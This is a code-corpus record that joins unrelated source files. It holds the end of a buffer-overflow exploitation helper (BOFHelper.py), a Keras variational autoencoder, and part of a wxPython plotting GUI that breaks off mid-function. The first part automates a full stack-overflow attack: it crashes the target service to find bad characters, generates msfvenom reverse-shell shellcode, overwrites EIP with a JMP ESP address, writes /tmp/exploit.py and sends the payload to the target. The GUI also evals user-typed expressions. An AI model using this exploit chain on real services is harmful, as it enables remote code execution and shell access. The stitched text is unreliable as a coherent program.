characters and asking for user input to determine\n # remaining bad characters.\n # @discussion After all critical bad characters have been discovered through __send_chars_auto, this\n # function sends the updated character list, supposedly causing a crash, and prompts the\n # user for either a hex dump or bad characters they identified manually. This is the last\n # step of bad character detection.\n # @param chars The list of characters to be sent to the service.\n # @param manual Whether to ask the user to manually identify bad characters instead of providing a hex\n # dump.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionTimeout if timed out; BOFErrorServiceAlive\n # if service did not crash.\n\n def __send_chars_user(self, chars: list[str], manual: bool = False) -> int:\n error = self.send_data(self.__build_bad_buffer(chars))\n if error == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n\n # Service should always crash\n if not self._check_crash(error):\n self._err_log(\"Service did not crash! (should never happen)\")\n return BOFErrorServiceAlive\n\n self._success_log(\"Characters sent!\")\n if manual:\n self.__check_input()\n else:\n self._prompt_log(\"Scroll to the middle of the 90's and make sure the dump starts with 01 02 03 04...!!!\")\n self.__check_dump(chars)\n return BOFErrorSuccess\n\n # @function __send_chars_auto\n # @abstract Recursively sends and updates character list to determine critical bad characters\n # @discussion This recursive function continuously send a list of string to the service until all\n # bad characters in it have been found. If the service did not crash due to send_data(),\n # the list would be split in two and sent respectively (with this function). The user\n # simply has to repeatedly restart the service as prompted.\n # @param chars The list of characters to be sent to the service.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionTimeout if timed out.\n\n def __send_chars_auto(self, chars: list[str]) -> int:\n self._debug_log(\"Sending: %s\" % \" \".join(chars))\n error = self.send_data(self.__build_bad_buffer(chars))\n if error == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n\n # If the service has crashed, there would be no bad characters in this subset\n if self._check_crash(error):\n self._prompt_restart()\n return BOFErrorSuccess\n\n # Service did not crash\n if len(chars) == 1:\n self._step_log(\"Identified new bad character: 0x%s\" % chars[0])\n self._badChars.append(chars[0])\n BOFAllHex.remove(chars[0])\n return BOFErrorSuccess\n\n # Split\n for chunk in split_list(chars, 2):\n error = self.__send_chars_auto(chunk)\n if error:\n return error\n\n return BOFErrorSuccess\n\n # @function _send_chars\n # @abstract Helper function to send all hex characters to the service.\n # @discussion This function splits BOFAllHex into chunks of @size and sends them respectively with\n # either __send_chars_auto() or __send_chars_user().\n # @param size The size of each segment to send.\n # @param auto Whether to use __send_chars_auto() or __send_chars_user().\n # @param manual Whether to ask the user to manually identify bad characters instead of providing a\n # dump. Taken into account only if auto is set.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionTimeout if timed out; BOFErrorServiceAlive\n # if service did not crash.\n\n def _send_chars(self, size: int, auto: bool = False, manual: bool = False) -> int:\n for i in range(0, len(BOFAllHex), size):\n if auto:\n error = self.__send_chars_auto(BOFAllHex[i:i + size])\n else:\n error = self.__send_chars_user(BOFAllHex[i:i + size], manual)\n if error:\n return error\n return BOFErrorSuccess\n\n # @function find_bad_chars\n # @abstract Find bad characters in the service.\n # @discussion This function attempts to discover all bad characters present in the service. It\n # initially uses the automated __send_chars_auto() helper to obtain all critical bad\n # characters (i.e. ones that would cause the service to not crash). Afterwards, it\n # sends the updated list of characters to the services with __send_chars_user(), which\n # would ask for user input that indicates the remaining bad characters.\n # Note that get_eip_offset() must be run before executing this function.\n # @result BOFErrorSuccess if succeeded; BOFErrorFailure if failed; BOFErrorInvalid if function\n # get_eip_offset() is not yet invoked.\n\n def find_bad_chars(self, manual: bool = False) -> int:\n if not self._eipObtained:\n self._err_log(\"Please first locate the EIP offset!\")\n return BOFErrorInvalid\n\n if not self._badCharsFound:\n self._step_log(\"Starting automatic detection of bad characters...\")\n size = self._eipOffset\n if self._eipOffset >= len(BOFAllHex):\n size = len(BOFAllHex)\n if self._send_chars(size, True):\n return BOFErrorFailure\n\n self._success_log(\"Automatic bad character detection complete!\")\n self._success_log(\"Bad characters found: 0x%s\" % \" 0x\".join(self._badChars))\n self._step_log(\"Sending characters to determine non-critical bad characters...\")\n self._debug_log(\"Characters to send: 0x%s\" % \" 0x\".join(BOFAllHex))\n self._prompt_debugger()\n if self._send_chars(size, False, manual):\n return BOFErrorFailure\n self._prompt_restart()\n\n self._badChars.sort()\n self._success_log(\"All bad characters: 0x%s\" % \" 0x\".join(self._badChars))\n self._badCharsFound = True\n return BOFErrorSuccess\n\n # @function set_bad_chars\n # @abstract Manually input the bad characters identified.\n # @param bad_chars The value @self._badChars is set to.\n # @result None.\n\n def set_bad_chars(self, bad_chars: list[str]) -> None:\n for item in bad_chars:\n if not is_hex(item) or len(item) != 2:\n bad_chars.remove(item)\n self._badChars.extend(bad_chars)\n self._badChars = list(set(self._badChars))\n self._badChars.sort()\n self._badCharsFound = True\n\n # @function generate_shellcode\n # @abstract Generate the shellcode for use in exploitation.\n # @discussion This function generates the shellcode with the command line package msfvenom. It\n # first asks for the user to specify a payload to use - if it does not exist, a list\n # of all available payloads would be printed. After successfully parsing the name,\n # this function executes a msfvenom command to generate the payload, automatically\n # completing the parameters with previously obtained values. The shellcode is stored\n # in @self._shellCode.\n # Note that function find_bad_chars() must be run before executing this function.\n # @result BOFErrorSuccess if succeeded; BOFErrorInvalid if function find_bad_chars() is not\n # yet invoked.\n\n def generate_shellcode(self) -> int:\n self._func_log(\"Generating shellcode...\")\n\n if not self._badCharsFound:\n self._err_log(\"Please first find the bad characters!\")\n return BOFErrorInvalid\n\n # Add NOP slides\n self._shellCode += b\"\\x90\" * int(self._input(\"Number of NOP slides: \"))\n self._step_log(\"Generating list of all payloads...\")\n all_payloads = execute(\"msfvenom --list payload\").decode()\n while True:\n ans = self._input(\"Please enter the name of the payload to employ: \").lower()\n if ans in all_payloads:\n self._shellCodeName = ans\n break\n self._warn_log(\"Payload name does not exist. Printing help page...\")\n print(all_payloads)\n\n if not self._lIP:\n self._warn_log(\"Failed to get local IP.\")\n try:\n ip = self._input(\"Local IP: \")\n socket.inet_aton(ip)\n except socket.error:\n self._err_log(\"IP address invalid!\")\n return BOFErrorFailure\n self._lIP = ip\n\n self._step_log(\"Generating shellcode %s...\" % self._shellCodeName)\n self._shellCode += execute(\"msfvenom -p %s LHOST=%s LPORT=%d EXITFUNC=thread -f raw –e x86/shikata_ga_nai \"\n \"-b \\\"\\\\x%s\\\"\" % (ans, self._lIP, self._lPort, \"\\\\x\".join(self._badChars)))\n self._shellCodeGenerated = True\n self._success_log(\"Shellcode generated!\")\n return BOFErrorSuccess\n\n # @function _check_space\n # @abstract Helper function to check if a certain amount of space is available in ESP.\n # @discussion It sends a payload with @space amount of bytes after ESP. The space's availability\n # is verified if the user confirms that the EIP and stack behave as expected.\n # @param space The amount of space whose availability would be checked.\n # @result True if available; False otherwise.\n\n def _check_space(self, space: int) -> bool:\n self._step_log(\"Checking if a space of %d is available in ESP...\" % space)\n if self._stackSpace >= space:\n self._success_log(\"Space (size = %d) available!\" % space)\n return True\n\n if self._strict:\n if space > self._numBytes - self._eipOffset - 4 - self._espPadding:\n self._err_log(\"Space unavailable!\")\n return False\n return True\n\n self._prompt_debugger()\n error = self.send_data(b\"\\x90\" * self._eipOffset + b\"A\" * 4 + b\"\\x90\" * (self._espPadding + space), 5)\n\n # Service should always crash\n if not self._check_crash(error) and error != BOFErrorConnectionTimeout:\n self._err_log(\"Service did not crash! (should never happen)\")\n return False\n\n # User validation required\n ans = self._input(\"Payload sent. Check to see if EIP is filled with 41414141 and if there is %d 90's after it. \"\n \"(y/n)\\n\").lower()\n\n # Success! Update stack space.\n if ans == 'y':\n self._success_log(\"Space (size = %d) available!\" % space)\n self._stackSpace = space\n self._prompt_restart()\n return True\n\n self._prompt_restart()\n return False\n\n # @function _find_space\n # @abstract Private function to locate space before EIP for the payload.\n # @discussion This function checks if the space before EIP could be used to store the payload\n # should ESP prove to be unavailable. If the space before EIP is larger than the\n # size of @self._shellcode, it would proceed to insert a first stage shellcode in\n # the ESP so that the program could jump to the shellcode. The user needs to provide\n # the register that the filler appears to be in. If no such register exist, an egg\n # hunter would be placed in ESP to search in memory for the shellcode.\n # @result BOFErrorSuccess if succeeded; BOFErrorNoSpace if there is no sufficient space for\n # payload; BOFErrorServiceAlive if service did not crash.\n\n def _find_space(self) -> int:\n if self._eipOffset < len(self._shellCode):\n self._err_log(\"There is not enough space before EIP to insert the payload!\")\n return BOFErrorNoSpace\n\n # Generate first stage shellcode\n self._prompt_debugger()\n if not self._check_crash(self.send_data(b\"\\x90\" * self._numBytes)):\n return BOFErrorServiceAlive\n register = self._input(\"Please enter the register that records your payload: \").lower()\n if is_register(register):\n skip = int(self._input(\"Bytes to skip: \"))\n if skip > 0:\n self._firstStageASM = \"add %s, %d\" % (register, skip)\n self._firstStage = asm(self._firstStageASM)\n jmp = \"jmp %s\" % register\n self._firstStage += asm(jmp)\n self._firstStageASM += jmp\n if not self._check_space(len(self._firstStage)):\n self._err_log(\"There is not enough space in ESP for the first stage shellcode!\")\n return BOFErrorNoSpace\n else:\n # TO-DO: EGG HUNTER\n self._warn_log(\"Register invalid! Building egg hunter...\")\n return BOFErrorInvalid\n\n # We have the entire filler space at our disposal\n self._prompt_restart()\n self._stackSpace = self._eipOffset\n self._spaceExpanded = True\n self._success_log(\"The filler space (%s) is all yours :)\" % self._eipOffset)\n return BOFErrorSuccess\n\n # @function expand_space\n # @abstract Attempt to expand the available space to store the shellcode.\n # @discussion In order for the shellcode to be injected, there must be sufficient space to store\n # it. This function invokes _check_space() with space = len(@self._shellCode) to check\n # if the shellcode could be placed in ESP. If not, it would proceed to _find_space() to\n # locate space before EIP.\n # Note that generate_shellcode() must be run before executing this function.\n # @result BOFErrorSuccess if succeeded; BOFErrorNoSpace if there is no sufficient space for\n # payload; BOFErrorServiceAlive if service did not crash; BOFErrorInvalid if shellcode\n # is not generated or ESP padding is not set.\n\n def expand_space(self) -> int:\n self._func_log(\"Expanding space...\")\n\n if self._spaceExpanded:\n return BOFErrorSuccess\n\n if not self._shellCodeGenerated:\n self._err_log(\"Please first generate the shellcode!\")\n return BOFErrorInvalid\n\n if not self._espPaddingSet:\n self._err_log(\"Please manually set the ESP padding!\")\n return BOFErrorInvalid\n\n if self._check_space(len(self._shellCode)):\n self._shellCodeInESP = True\n self._spaceExpanded = True\n return BOFErrorSuccess\n\n self._shellCodeInESP = False\n self._step_log(\"Unable to perform expansion. Proceeding to find space...\")\n return self._find_space()\n\n # @function _build_exploit\n # @abstract Build @self._exploit with the other functions executed.\n # @result BOFErrorSuccess if succeeded; BOFErrorInvalid if function expand_space() is not yet invoked\n # or if the entered return address is invalid..\n\n def _build_exploit(self) -> int:\n self._func_log(\"Building exploit...\")\n\n if not self._spaceExpanded:\n self._err_log(\"Please first expand space for shellcode!\")\n return BOFErrorInvalid\n\n # Find return address (JMP ESP)\n self._prompt_log(\"Tip: !mona find -s \\\"\\\\xff\\\\xe4\\\"\")\n ans = self._input(\"Enter address to overwrite EIP with: \").lower().replace(\"\\\\x\", \"\").replace(\"0x\", \"\")\n if not is_hex(ans) or len(ans) != 8:\n self._err_log(\"Address invalid!\")\n return BOFErrorInvalid\n self._eip = pack(\" 0:\n self._exploit += b\"\\x90\" * self._endPadding\n\n self._success_log(\"Exploit built successfully!\", True)\n return BOFErrorSuccess\n\n # @function generate_file\n # @abstract Build a Proof of Concept script with the information gathered by other functions.\n # @discussion The generated script, /tmp/exploit.py, would be in Python 2 format due to issues with\n # Python 3 encoding.\n # @result BOFErrorSuccess if succeeded; BOFErrorFailure if the exploit is not built successfully.\n\n def generate_file(self) -> int:\n self._func_log(\"Generating exploit.py...\")\n\n if not self._exploit:\n if self._build_exploit():\n return BOFErrorFailure\n\n heading = \"#!/usr/bin/python\\n\" \\\n \"import socket\\n\\n\" \\\n \"try:\\n\" \\\n \" print '(-) Initializing variables...'\\n\\n\"\n variables = \" # %s - LHOST: %s - LPORT: %d\\n\" \\\n \" shellcode = (\" % (self._shellCodeName, self._lIP, self._lPort)\n shell_str = bytes_escape_all(self._shellCode)\n len_shell = len(shell_str)\n for i in range(0, len_shell, 15):\n if i > 0:\n variables += \" \"\n variables += \"'\" + ''.join(shell_str[i:i + 15])\n if len_shell - i > 15:\n variables += \"'\\n\"\n variables += \"')\\n\\n\"\n\n payload_str = (\" payload = %s\" % self._prefix).replace(\"b'\", \"'\")\n if not self._shellCodeInESP:\n payload_str += \" + shellcode\"\n variables += \" # Bad characters: 0x%s\\n\" % \" 0x\".join(self._badChars)\n\n variables += \"\"\n if self._shellCodeInESP:\n eip_offset = self._eipOffset\n else:\n eip_offset = self._eipOffset - len(self._shellCode)\n if eip_offset > 0:\n variables += \" filler = '\\\\x90' * %d\\n\" % eip_offset\n payload_str += \" + filler\"\n\n variables += \" eip = %s\\n\" % bytes_escape_all_str(self._eip)\n payload_str += \" + eip\"\n\n if self._espPadding > 0:\n variables += \" offset = 'B' * %d\\n\" % self._espPadding\n payload_str += \" + offset\"\n\n if self._shellCodeInESP:\n payload_str += \" + shellcode\"\n else:\n variables += \" # %s\" % self._firstStageASM\n variables += (\" first_stage = %s\\n\" % bytes_escape_all_str(self._firstStage)).replace(\"b'\", \"'\")\n payload_str += \" + first_stage\"\n\n if self._strict and self._endPadding > 0:\n payload_str += \" + '\\\\x90' * %d\" % self._endPadding\n payload_str += (\" + %s\\n\\n\" % self._suffix).replace(\"b'\", \"'\")\n variables += payload_str.replace(\"'' + \", \"\").replace(\" + ''\", \"\")\n\n if self._origHeader:\n variables += (\" buffer = %s\\n\"\n \" buffer += payload\\n\\n\" % self._origHeader).replace(\" buffer = b\", \" buffer = \")\n variables = self._process_header_file(variables)\n\n footing = \" print '(-) Sending payload...'\\n\" \\\n \" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n\" \\\n \" s.connect(('%s', %d))\\n\" \\\n \" s.send(\" % (self._ip, self._port)\n if self._origHeader:\n footing += \"buffer\"\n else:\n footing += \"payload\"\n\n footing += \")\\n\" \\\n \" s.close()\\n\" \\\n \" print '[+] Exploitation complete!'\\n\\n\" \\\n \"except:\\n\" \\\n \" print '(!!!) Exploitation failed!'\\n\" \\\n \" exit(0)\\n\"\n\n file = open(\"/tmp/exploit.py\", \"w\")\n file.write(heading + variables + footing)\n file.close()\n self._success_log(\"Successfully generated /tmp/exploit.py!\")\n self._fileGenerated = True\n return BOFErrorSuccess\n\n # @function send_exploit\n # @abstract Dispatch the exploit.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionTimeout if timed out; BOFErrorFailure if\n # the exploit is not built successfully or if exploitation failed.\n\n def send_exploit(self) -> int:\n self._func_log(\"Exploiting...\")\n\n if not self._exploit:\n if self._build_exploit():\n return BOFErrorFailure\n\n self._prompt_log(\"Remember to open up a listener on port %d if you are using the shellcode \"\n \"to gain a reverse shell!\" % self._lPort)\n input()\n self._verify = False\n\n error = self.send_data(self._exploit, 5, False)\n if error == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n\n if self._check_crash(error):\n self._err_log(\"Exploit failed. Try sending the payload manually.\")\n return BOFErrorFailure\n\n self._success_log(\"Exploitation completed!!!\")\n return BOFErrorSuccess\n\n # @function perform_bof\n # @abstract Perform a full BoF exploit with member functions.\n # @result True if succeeded; False if failed.\n\n def perform_bof(self) -> bool:\n if self.get_num_bytes() < 0:\n return False\n if self.get_eip_offset() < 0:\n return False\n if self.find_bad_chars():\n return False\n if self.generate_shellcode():\n return False\n if self.expand_space():\n return False\n if self.generate_file():\n return False\n if self.send_exploit():\n return False\n return True\n","repo_name":"CharlieJiangXXX/BOFHelper","sub_path":"BOFHelper.py","file_name":"BOFHelper.py","file_ext":"py","file_size_in_byte":50924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40539266106","text":"from tensorflow_probability import layers as tfpl\nfrom tensorflow_probability import distributions as tfpd\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Flatten, Conv2D, Conv2DTranspose, Reshape\nimport tensorflow as tf\nfrom tensorflow import keras\n\n\nclass VariationalAutoEncoder(Model):\n\n def __init__(\n self,\n learning_rate=0.01,\n kl_weight=1,\n encoded_dims=4,\n retrain=False,\n file_path=\"models/vae/vae\",\n *args,\n **kwargs\n ):\n super().__init__(*args, **kwargs)\n self.file_path = file_path\n self.learning_rate = learning_rate\n self.kl_weight = kl_weight\n self.encoded_dims = encoded_dims\n self.encoder = None\n self.decoder = None\n self.model_trained = False\n self.retrain = retrain\n self.setup_model()\n\n def setup_model(self):\n prior = tfpd.Independent(\n tfpd.Normal(\n loc=tf.zeros(self.encoded_dims),\n scale=1\n ),\n reinterpreted_batch_ndims=1\n )\n self.encoder = Sequential([\n Conv2D(16, input_shape=(28, 28, 1), kernel_size=(3, 3), strides=(2, 2), padding=\"same\", activation=\"leaky_relu\"),\n # Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding=\"same\", activation=\"relu\"),\n Conv2D(32, kernel_size=(3, 3), strides=(2, 2), padding=\"same\", activation=\"leaky_relu\"),\n # Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding=\"same\", activation=\"relu\"),\n Flatten(),\n Dense(tfpl.IndependentNormal.params_size(self.encoded_dims)),\n tfpl.IndependentNormal(\n self.encoded_dims,\n convert_to_tensor_fn=tfpd.Distribution.sample,\n activity_regularizer=tfpl.KLDivergenceRegularizer(prior, weight=self.kl_weight))\n ])\n\n self.decoder = Sequential([\n Dense(7 * 7 * self.encoded_dims),\n Reshape((7, 7, self.encoded_dims)),\n Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding=\"same\", activation=\"leaky_relu\"),\n Conv2DTranspose(32, kernel_size=(3, 3), strides=(2, 2), padding=\"same\", activation=\"leaky_relu\"),\n Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding=\"same\", activation=\"leaky_relu\"),\n Conv2DTranspose(16, kernel_size=(3, 3), strides=(2, 2), padding=\"same\", activation=\"leaky_relu\"),\n Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding=\"same\"),\n Flatten(),\n tfpl.IndependentBernoulli((28, 28, 1))\n ])\n\n negative_log_likelihood = lambda x, rv_x: -rv_x.log_prob(x)\n self.compile(\n optimizer=keras.optimizers.Adam(learning_rate=self.learning_rate),\n loss=negative_log_likelihood\n )\n\n try:\n self.load_weights(filepath=self.file_path)\n self.model_trained = True\n except:\n print(\"No predefined weights found\")\n\n def call(self, inputs, **kwargs):\n encoded = self.encoder(inputs)\n decoded = self.decoder(encoded)\n return decoded\n\n def fit(self, **kwargs):\n if not self.model_trained or self.retrain:\n super().fit(**kwargs)\n print(\"Storing learned weights...\")\n self.save_weights(self.file_path)\n\n def get_config(self):\n pass\n","repo_name":"P1NHE4D/it3030_project02","sub_path":"vae/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12380060879","text":"# -*- coding: utf-8 -*-\n#\n# NanchiPlot 0.1.0-dev\n# License: MIT License\n# Author: Pedro Jorge De Los Santos\n# E-mail: delossantosmfq@gmail.com \n# Code: https://github.com/JorgeDeLosSantos/NanchiPlot\n#\n#~ from __future__ import absolute_import\n\nimport wx\nimport os\nimport numpy as np\n\n# Nanchi files\ntry:\n from initmpl import *\n import setplot # Axes & Figure props\n import iodata as io # Read & Write data\n import uibase as ui # Main interfaces\n import uiaux as aux # Auxiliar interfaces\n import uitoolbar as tb # Toolbars (Toolbar, AxesToolbar, LineToolbar)\n from _const_ import * # Constants\nexcept ImportError:\n from nanchi.initmpl import *\n import nanchi.setplot as setplot# Axes & Figure props\n import nanchi.iodata as io # Read & Write data\n import nanchi.uibase as ui # Main interfaces\n import nanchi.uiaux as aux # Auxiliar interfaces\n import nanchi.uitoolbar as tb # Toolbars (Toolbar, AxesToolbar, LineToolbar)\n from nanchi._const_ import * # Constants\n\n\nclass NanchiPlot(wx.Frame):\n def __init__(self,parent):\n wx.Frame.__init__(self,parent,title=NANCHI_MAIN_CAPTION,size=(800,600))\n self.initMenu()\n self.initCtrls()\n self.initCtrls()\n self.initToolBar()\n self.initSizers()\n self.initEvents()\n \n # Icon\n self.icon = wx.Icon(PATH_NANCHI_LOGO)\n self.SetIcon(self.icon)\n \n # Reference to main objects\n self.axes = self.notebook.graphs.axes\n self.figure = self.notebook.graphs.figure\n self.canvas = self.notebook.graphs.canvas\n self.data = self.notebook.data\n \n # Display on center\n self.Centre(True)\n self.Show()\n \n def initMenu(self):\n \"\"\"\n Creating menu bar\n \"\"\"\n m_file = wx.Menu()\n save = m_file.Append(-1, \"Save image... \\tCtrl+S\")\n export_img = m_file.Append(-1, \"Export data as image...\")\n export_txt = m_file.Append(-1, \"Export data as ASCII...\")\n m_file.AppendSeparator()\n import_data = m_file.Append(-1, \"Import data... \\tCtrl+I\")\n import_image = m_file.Append(-1, \"Import image...\")\n m_file.AppendSeparator()\n _exit = m_file.Append(-1, \"Quit \\tCtrl+Q\")\n \n m_help = wx.Menu()\n _help = m_help.Append(-1, \"Help\")\n about = m_help.Append(-1, \"About...\")\n \n menu_bar = wx.MenuBar()\n menu_bar.Append(m_file, \"File\")\n menu_bar.Append(m_help, \"Help\")\n self.SetMenuBar(menu_bar)\n \n self.Bind(wx.EVT_MENU, self.OnSave, save)\n self.Bind(wx.EVT_MENU, self.OnExportASCII, export_txt)\n self.Bind(wx.EVT_MENU, self.OnExportImage, export_img)\n \n self.Bind(wx.EVT_MENU, self.OnImport, import_data)\n self.Bind(wx.EVT_MENU, self.OnLoadImage, import_image)\n \n self.Bind(wx.EVT_MENU, self.OnAbout, about)\n self.Bind(wx.EVT_MENU, self.OnHelp, _help)\n self.Bind(wx.EVT_MENU, self.OnExit, _exit)\n \n def initSizers(self):\n \"\"\"\n Initialize sizers\n \"\"\"\n self.mainsz = wx.BoxSizer(wx.VERTICAL)\n self.panelsz = wx.BoxSizer(wx.HORIZONTAL)\n \n self.mainsz.Add(self.toolbar, 0, wx.EXPAND)\n self.panelsz.Add(self.notebook, 1, wx.EXPAND|wx.ALL, 2)\n\t\t\n self.panelsz.Add(self.axestoolbar, 0, wx.EXPAND|wx.ALL)\n self.panelsz.Add(self.linetoolbar, 0, wx.EXPAND|wx.ALL)\n\t\t\n self.mainsz.Add(self.mainpanel, 1, wx.EXPAND)\n \n self.mainpanel.SetSizer(self.panelsz)\n self.SetSizer(self.mainsz)\n \n def initCtrls(self):\n \"\"\"\n Initialize basic controls\n \"\"\"\n # Status bar\n self.SB_FONT = wx.Font(10, wx.SWISS, wx.NORMAL, wx.NORMAL)\n self.SB_FONT.SetFaceName(u\"DejaVu Sans Mono\")\n self.sb = aux.StatusBar(self, -1)\n self.sb.SetFont(self.SB_FONT)\n self.sb.SetForegroundColour(\"#aa00aa\")\n self.SetStatusBar(self.sb)\n self.sb.SetStatusText(SB_ON_INIT)\n \n self.mainpanel = wx.Panel(self,-1)\n self.notebook = ui.NanchiNoteBook(self.mainpanel)\n \n def initToolBar(self):\n \"\"\"\n Initialize tool bar\n \"\"\"\n self.toolbar = tb.MainToolbar(self)\n self.toolbar.Realize()\n \n self.axestoolbar = tb.AxesToolbar(self.mainpanel)\n self.axestoolbar.Realize()\n \n self.linetoolbar = tb.LineToolbar(self.mainpanel)\n self.linetoolbar.Realize()\n \n def initEvents(self):\n \"\"\"\n Initialize events\n \"\"\"\n self.graphs = self.notebook.graphs\n \n self.Bind(wx.EVT_TOOL, self.OnImport, self.toolbar.import_tool)\n self.Bind(wx.EVT_TOOL, self.OnLoadImage, self.toolbar.load_image_tool)\n self.Bind(wx.EVT_TOOL, self.OnFunction, self.toolbar.function_tool)\n self.Bind(wx.EVT_TOOL, self.OnBivariableFunction, self.toolbar.bivariable_function_tool)\n self.Bind(wx.EVT_TOOL, self.OnPlot, self.toolbar.plot_tool)\n self.Bind(wx.EVT_TOOL, self.OnBar, self.toolbar.bar_tool)\n self.Bind(wx.EVT_TOOL, self.OnScatter, self.toolbar.scatter_tool)\n self.Bind(wx.EVT_TOOL, self.OnPie, self.toolbar.pie_tool)\n self.Bind(wx.EVT_TOOL, self.OnImage, self.toolbar.image_tool)\n self.Bind(wx.EVT_TOOL, self.OnContour, self.toolbar.contour_tool)\n self.Bind(wx.EVT_TOOL, self.OnContourf, self.toolbar.contourf_tool)\n \n \n self.Bind(wx.EVT_TOOL, self.graphs.OnZoom, self.axestoolbar.zoom_box_tool)\n self.Bind(wx.EVT_TOOL, self.OnResetView, self.axestoolbar.reset_view_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnBackground, self.axestoolbar.axes_color_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnGridColor, self.axestoolbar.grid_color_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnGridStyle, self.axestoolbar.grid_style_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnXLabel, self.axestoolbar.xlabel_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnYLabel, self.axestoolbar.ylabel_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnXTicks, self.axestoolbar.xticks_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnYTicks, self.axestoolbar.yticks_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnLineColor, self.linetoolbar.line_color_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnLineWidth, self.linetoolbar.line_width_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnLineStyle, self.linetoolbar.line_style_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnLineLabel, self.linetoolbar.line_label_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnShowLegend, self.linetoolbar.show_legend_tool)\n \n self.Bind(wx.EVT_TOOL, self.OnPieLabels, self.linetoolbar.pie_labels_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnMoveLine, self.linetoolbar.move_line_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnMoveText, self.linetoolbar.move_text_tool)\n \n self.Bind(wx.EVT_TOOL, self.OnPieLabels, self.linetoolbar.pie_labels_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnMoveLine, self.linetoolbar.move_line_tool)\n self.Bind(wx.EVT_TOOL, self.graphs.OnMoveText, self.linetoolbar.move_text_tool)\n \n self.Bind(wx.EVT_TOOL, self.graphs.OnText, self.linetoolbar.text_tool)\n\n \n def OnExit(self,event):\n \"\"\"\n File -> Quit \n \"\"\"\n self.Close(True)\n \n def OnHelp(self,event):\n \"\"\"\n Help -> Help\n \"\"\"\n try:\n os.startfile(PATH_DOCUMENTATION_HTML)\n except:\n \"\"\"\n Not exist file\n \"\"\"\n print(\"Help file not found\")\n pass\n \n def OnSave(self,event):\n \"\"\"\n File -> Save image... -> (Short-Cut) Ctrl + S\n \"\"\"\n wldc = ON_SAVE_WILDCARD\n dlg=wx.FileDialog(self, \"Save\", os.getcwd(), style=wx.SAVE, wildcard=wldc)\n if dlg.ShowModal() == wx.ID_OK:\n self.figure.savefig(dlg.GetPath())\n dlg.Destroy()\n \n def OnExportASCII(self,event):\n data = self.data.grid_data.GetArrayData()\n wldc = ON_EXPORT_ASCII_WILDCARD\n dlg=wx.FileDialog(self, \"Save\", os.getcwd(), style=wx.SAVE, wildcard=wldc)\n if dlg.ShowModal() == wx.ID_OK:\n fname = dlg.GetPath()\n io.write_txt(fname, data)\n dlg.Destroy()\n \n def OnExportImage(self,event):\n data = self.data.grid_data.GetArrayData()\n wldc = ON_EXPORT_IMAGE_WILDCARD\n dlg=wx.FileDialog(self, \"Save\", os.getcwd(), style=wx.SAVE, wildcard=wldc)\n if dlg.ShowModal() == wx.ID_OK:\n fname = dlg.GetPath()\n io.imsave(fname, data)\n dlg.Destroy()\n \n \n def OnImport(self,event):\n \"\"\"\n Import data\n \"\"\"\n dlg = aux.ImportDialog(None)\n if dlg.ShowModal() == wx.ID_OK:\n busy_dlg = aux.BusyInfo(\"Wait a moment...\", self)\n data = dlg.GetData()\n if data is None:\n self.sb.SetStatusText(SB_ON_IMPORT_DATA_FAIL%(path))\n del busy_dlg\n else:\n self.data.grid_data.SetArrayData(data)\n del busy_dlg\n dlg.Destroy()\n \n \n def OnLoadImage(self,event):\n \"\"\"\n Import images\n \"\"\"\n path = \"\"\n wildcard = ON_IMPORT_IMAGE_WILDCARD\n dlg = wx.FileDialog(self, message=\"Select an image\",\n defaultDir=os.getcwd(), wildcard=wildcard, style=wx.OPEN)\n if dlg.ShowModal() == wx.ID_OK:\n busy_dlg = aux.BusyInfo(\"Wait a moment...\", self)\n path = dlg.GetPath()\n data = io.imread(path)\n self.data.grid_data.SetArrayData(data)\n self.sb.SetStatusText(SB_ON_IMPORT_IMAGE%(path))\n del busy_dlg\n else:\n self.sb.SetStatusText(SB_ON_IMPORT_IMAGE_CANCEL)\n dlg.Destroy()\n \n \n def OnFunction(self,event):\n \"\"\"\n Create data from f(x) function\n \"\"\"\n from numpy import (sin,cos,tan,log,exp)\n dialog = aux.FunctionDialog(None)\n if dialog.ShowModal() == wx.ID_OK:\n fx,a,b,points = dialog.GetData()\n try:\n x = np.linspace(float(a), float(b), float(points))\n fx = eval(fx)\n self.data.grid_data.SetArrayData(np.array([x,fx]).transpose())\n self.data.grid_data.SetColLabelValue(0,\"x\")\n self.data.grid_data.SetColLabelValue(1,\"f(x)\")\n self.sb.SetStatusText(SB_ON_CREATE_DATA_FUNCTION)\n except:\n self.sb.SetStatusText(SB_ERROR_ON_CREATE_DATA)\n dialog.Destroy()\n \n \n def OnBivariableFunction(self,event):\n \"\"\"\n Create data from f(x,y) function\n \"\"\"\n from numpy import (sin,cos,tan,log,exp)\n dialog = aux.BivariableFunctionDialog(None)\n if dialog.ShowModal() == wx.ID_OK:\n fxy,x,y,points = 